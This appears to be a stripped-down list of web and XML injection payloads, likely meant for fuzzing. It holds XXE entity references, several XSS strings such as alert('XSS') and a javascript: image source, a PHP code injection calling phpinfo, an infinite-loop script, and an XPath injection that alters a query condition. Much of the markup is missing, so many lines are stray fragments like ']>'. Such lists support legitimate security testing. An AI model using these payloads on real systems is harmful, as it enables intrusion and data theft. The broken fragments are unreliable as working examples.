%foo;
&foo;
]>
]>
]>
]>
]>
%dtd;%trick;]>
%dtd;%trick;]>
]>
]>&foo;
"> %int;
">
SCRIPT]]>alert('XSS');/SCRIPT]]>
var n=0;while(true){n++;}]]>
]]>
]>&xxe;
]>
]>&xxe;
]>
]>&xxe;
]>
]>&xxe;
]>
]>&xxe;
]>&xxe;
]>
]>
]>&foo;
SCRIPT]]>alert('XSS');/SCRIPT]]>
XSS
SCRIPT]]>alert('XSS');/SCRIPT]]>
','')); phpinfo(); exit;/*
%dtd;]>]]>
<IMG SRC="javascript:alert('XSS')">
]]>
count(/child::node())
x' or name()='username' or 'x'='y